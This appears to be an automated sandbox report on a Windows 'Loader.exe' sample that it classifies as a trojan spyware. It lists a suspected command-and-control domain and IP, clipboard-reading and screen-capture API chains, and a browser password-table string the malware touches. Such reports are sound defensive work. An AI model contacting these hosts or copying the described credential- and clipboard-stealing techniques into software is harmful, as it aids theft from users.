                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Loader.exe, 00000002.00000003.1713923065.00000000052B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Loader.exe, 00000002.00000002.2921671681.000000000301C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1745521965.000000000301C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
                Source: Loader.exe, 00000002.00000003.1689482955.0000000003035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/AA
                Source: Loader.exe, 00000002.00000003.1689482955.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1689482955.000000000302A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2380858367.0000000003091000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1768355829.0000000003092000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1751671802.00000000030A4000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2381124691.00000000030A5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2380673870.000000000308F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1713749845.0000000005288000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1713773535.000000000528B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2921919772.00000000030A5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1713494802.0000000005286000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2921877165.0000000003093000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1751671802.0000000003093000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1725461446.000000000528D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
                Source: Loader.exe, 00000002.00000003.2381124691.00000000030A5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2921919772.00000000030A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apil
                Source: Loader.exe, 00000002.00000003.1751671802.0000000003087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api
                Source: Loader.exe, 00000002.00000003.1745425730.0000000005289000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1752143168.000000000528A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/apiackages
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Loader.exe, 00000002.00000003.1691092298.0000000005325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Loader.exe, 00000002.00000003.1702857705.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691092298.0000000005323000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1703001008.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691247767.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691350994.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1702905282.00000000052D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Loader.exe, 00000002.00000003.1691247767.00000000052B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Loader.exe, 00000002.00000003.1702857705.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691092298.0000000005323000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1703001008.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691247767.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1691350994.00000000052D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1702905282.00000000052D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Loader.exe, 00000002.00000003.1691247767.00000000052B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Loader.exe, 00000002.00000003.1715281830.000000000528B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: Loader.exe, 00000002.00000003.1690692563.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690621567.00000000052CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Loader.exe, 00000002.00000003.1715024195.00000000053A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00432490 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00432490
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_02FD1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,2_2_02FD1000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00432490 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00432490
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00432620 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00432620
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D4EA8E0_2_00D4EA8E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D434400_2_00D43440
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D3DDE20_2_00D3DDE2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D505020_2_00D50502
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00D396DB0_2_00D396DB
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004388902_2_00438890
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004121202_2_00412120
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0040A9B02_2_0040A9B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043FA602_2_0043FA60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004152702_2_00415270
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004262702_2_00426270
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00422A282_2_00422A28
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004402E02_2_004402E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004232882_2_00423288
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043BB602_2_0043BB60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041ECC02_2_0041ECC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004224ED2_2_004224ED
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0040E6352_2_0040E635
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0040D6C52_2_0040D6C5
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004086F02_2_004086F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042AF452_2_0042AF45
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043F0402_2_0043F040
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004308002_2_00430800
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004098142_2_00409814
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041D0202_2_0041D020
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041B8392_2_0041B839
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004058C02_2_004058C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042D0FF2_2_0042D0FF
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004320A02_2_004320A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004038B02_2_004038B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004281502_2_00428150
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004219602_2_00421960
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042796F2_2_0042796F
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043F1302_2_0043F130
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042E1C62_2_0042E1C6
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004171F02_2_004171F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042A9F02_2_0042A9F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004199802_2_00419980
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004381A02_2_004381A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004371AD2_2_004371AD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004061B02_2_004061B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004092402_2_00409240
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00423A502_2_00423A50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004042602_2_00404260
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041627D2_2_0041627D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00439A002_2_00439A00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041D2F02_2_0041D2F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043C2802_2_0043C280
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004322902_2_00432290
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004082B02_2_004082B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043F2B02_2_0043F2B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00439B492_2_00439B49
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043F3502_2_0043F350
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00436B5C2_2_00436B5C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004253702_2_00425370
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0040FB162_2_0040FB16
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00408B302_2_00408B30
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042D3302_2_0042D330
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004193D22_2_004193D2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043F3E02_2_0043F3E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00404BA02_2_00404BA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00435BAA2_2_00435BAA
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004204402_2_00420440
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004394602_2_00439460
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041DC102_2_0041DC10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004074202_2_00407420
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041B4322_2_0041B432
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043FCE02_2_0043FCE0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042E4F12_2_0042E4F1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041FC892_2_0041FC89
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043648E2_2_0043648E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042DCAF2_2_0042DCAF
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042FDD02_2_0042FDD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00421D902_2_00421D90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004115982_2_00411598
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004066402_2_00406640
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042B65A2_2_0042B65A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00423E612_2_00423E61
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00405E102_2_00405E10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0040AE902_2_0040AE90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00402EB02_2_00402EB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004267402_2_00426740
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00437F402_2_00437F40
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00417F482_2_00417F48
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042B7482_2_0042B748
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004147602_2_00414760
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004267602_2_00426760
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041D7002_2_0041D700
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004097102_2_00409710
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00416F132_2_00416F13
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_004297202_2_00429720
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042873A2_2_0042873A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042B7C32_2_0042B7C3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00428FD02_2_00428FD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043FFE02_2_0043FFE0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0042A7F02_2_0042A7F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043CFF72_2_0043CFF7
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00417FB12_2_00417FB1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0043BFB02_2_0043BFB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00D4EA8E2_2_00D4EA8E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00D434402_2_00D43440
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00D3DDE22_2_00D3DDE2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00D505022_2_00D50502
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00D396DB2_2_00D396DB
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00407FB0 appears 42 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00D41D28 appears 42 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00D4670D appears 34 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00414750 appears 78 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00D39BF0 appears 94 times
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Loader.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003276837624584
                Source: Loader.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003276837624584
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00438890 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00438890
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
                Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Loader.exe, 00000002.00000003.1702889101.000000000528B000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1702905282.0000000005293000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1690919190.00000000052B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Loader.exeReversingLabs: Detection: 44%
                Source: Loader.exeVirustotal: Detection: 38%
                Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
